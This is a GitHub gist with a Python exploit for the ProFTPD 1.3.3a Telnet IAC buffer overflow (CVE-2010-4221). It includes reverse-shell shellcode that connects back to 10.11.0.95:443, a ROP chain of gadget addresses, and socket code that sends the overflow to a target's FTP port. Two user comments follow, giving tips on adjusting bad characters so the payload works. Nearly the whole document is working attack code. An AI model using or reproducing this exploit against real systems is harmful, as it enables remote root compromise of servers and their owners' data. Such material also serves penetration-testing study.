Last active
October 25, 2019 08:16
-
-
Save AfroThundr3007730/8e3f834a1b0bb59c53ae8573d980fca3 to your computer and use it in GitHub Desktop.
Modified version of CVE-2010-4221 python script found here: https://github.com/Muhammd/ProFTPD-1.3.3a/blob/master/ProFTPD_exploit.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# | |
################################################################################################### | |
# # # | |
# Vulnerability: ProFTPD IAC Remote Root Exploit # Telnet IAC Buffer Overflow (Linux) # | |
# # ProFTPD 1.3.2rc3 # | |
# Vulnerable Application: ProFTPD 1.3.3a # This is a part of the Metasploit Module, # | |
# Tested on Linux 2.6.32-5-686 # exploit/linux/ftp/proftp_telnet_iac # | |
# # # | |
# Author: Muhammad Haidari # Spawns a reverse shell to 10.11.0.95:443 # | |
# Contact: ghmh@outlook.com # # | |
# Website: www.github.com/muhammd # # | |
# # # | |
################################################################################################### | |
# | |
# | |
# Usage: python ProFTPD_exploit.py <Remote IP Address> | |
import sys | |
import socket | |
import struct | |
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.11.0.95 LPORT=443 EXITFUNC=thread \ | |
# PrependChrootBreak=true --smallest -f python -b '\x09\x0a\x0b\x0c\x0d\x20\xff' | |
payload = ( | |
'\x6a\x1d\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x77\x29\x9a' | |
'\x30\x83\xeb\xfc\xe2\xf4\x46\xe0\xab\xeb\x1d\x6f\xc2\xfd\xf7\x43' | |
'\xa7\xb9\x94\x43\xbd\x68\xba\xa9\x13\xe9\x2f\xe4\x1a\x01\xb7\x79' | |
'\xfc\x58\x59\x07\x13\xd3\x1d\x14\xc3\x80\x7b\xe4\x1a\xd2\x8d\x43' | |
'\xa7\xb9\xae\x71\x57\xb0\x46\xf2\x6d\xd3\x24\x6a\xc9\x5a\x75\xa0' | |
'\x7b\x80\x11\xe4\x1a\xa3\x2e\x99\xa5\xfd\xf7\x60\xe3\xc9\x1f\x23' | |
'\x91\x30\x28\x41\x98\x30\x76\x92\x13\xd1\xc7\x4f\xca\x61\x24\x9a' | |
'\x99\xb9\x96\xe4\x1a\x62\x1f\x47\xb5\x43\x1f\x41\xb5\x1f\x15\x40' | |
'\x13\xd3\x25\x7a\x13\xd1\xc7\x22\x57\xb0' | |
) | |
# NOTE: All addresses are from the proftpd binary | |
IACCount = 4096 + 16 | |
Offset = 0x102c - 4 | |
Ret = '0x805a547' # pop esi / pop ebp / ret | |
Writable = '0x80e81a0' # .data | |
if len(sys.argv) < 2: | |
print('\nUsage: %s <HOST>\n' % (sys.argv[0])) | |
sys.exit() | |
rop = struct.pack('<L', 0xcccccccc) # unused | |
# mov eax,esi / pop ebx / pop esi / pop ebp / ret | |
rop += struct.pack('<L', 0x805a544) | |
rop += struct.pack('<L', 0xcccccccc) # becomes ebx | |
rop += struct.pack('<L', 0xcccccccc) # becomes esi | |
rop += struct.pack('<L', 0xcccccccc) # becomes ebp | |
# quadruple deref the res pointer :) | |
for _ in range(4): | |
rop += struct.pack('<L', 0x8068886) # mov eax,[eax] / ret | |
# skip the pool chunk header | |
for _ in range(16): | |
rop += struct.pack('<L', 0x805bd8e) # inc eax / adc cl, cl / ret | |
# execute the data :) | |
rop += struct.pack('<L', 0x0805c26c) # jmp eax | |
buf = 'SITE ' | |
buf += payload | |
if len(buf) % 2 == 0: | |
buf += 'B' | |
print('Buffer was aligned') | |
buf += '\xff' * (IACCount - len(payload)) | |
buf += '\x90' * (Offset - len(buf)) | |
addrs = struct.pack('<L', 0x805a547) # Ret | |
addrs += struct.pack('<L', 0x80e81a0) # Writable | |
addrs += rop | |
buf += addrs | |
buf += '\r\n' | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((sys.argv[1], 21)) | |
s.recv(1024) | |
s.send(buf) | |
print('Payload Successfully Send...Check your Multi/Handler') | |
print('....Reverse shell is comming to you...') | |
print(s.recv(1024)) | |
s.close() |
Hmm, IIRC, I didn't have any issues with the current badchars, but it was a while ago. YMMV, I guess.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
bad characters xff and x0d kept breaking my creation.
Either i got lucky when i removed them (they aren't in metasploit code) OR they don't matter.
Try removing them, or remaking the payload until it succeeds.